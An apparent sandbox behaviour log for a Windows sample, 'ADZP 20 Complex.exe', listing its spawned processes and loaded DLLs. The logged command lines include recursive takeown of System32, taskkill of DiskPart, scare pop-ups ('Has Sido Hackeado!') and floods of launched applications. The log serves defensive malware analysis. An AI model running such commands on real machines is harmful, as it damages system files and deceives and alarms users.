Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msg.exe msg * Virus Detectado |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msg.exe msg * Virus Detectado |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado! |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\notepad.exe notepad |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\calc.exe calc |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\explorer.exe explorer.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mspaint.exe mspaint.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\notepad.exe notepad |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\calc.exe calc |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\explorer.exe explorer.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mspaint.exe mspaint.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\notepad.exe notepad |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\calc.exe calc |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\explorer.exe explorer.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /r |
Jump to behavior |
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: policymanager.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: msvcp110_win.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: pcacli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\System32\takeown.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\takeown.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\ipconfig.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\ipconfig.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Windows\System32\ipconfig.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Windows\System32\ipconfig.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\taskkill.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\attrib.exe |
Section loaded: ulib.dll |
Jump to behavior |
Source: C:\Windows\System32\attrib.exe |
Section loaded: fsutilext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
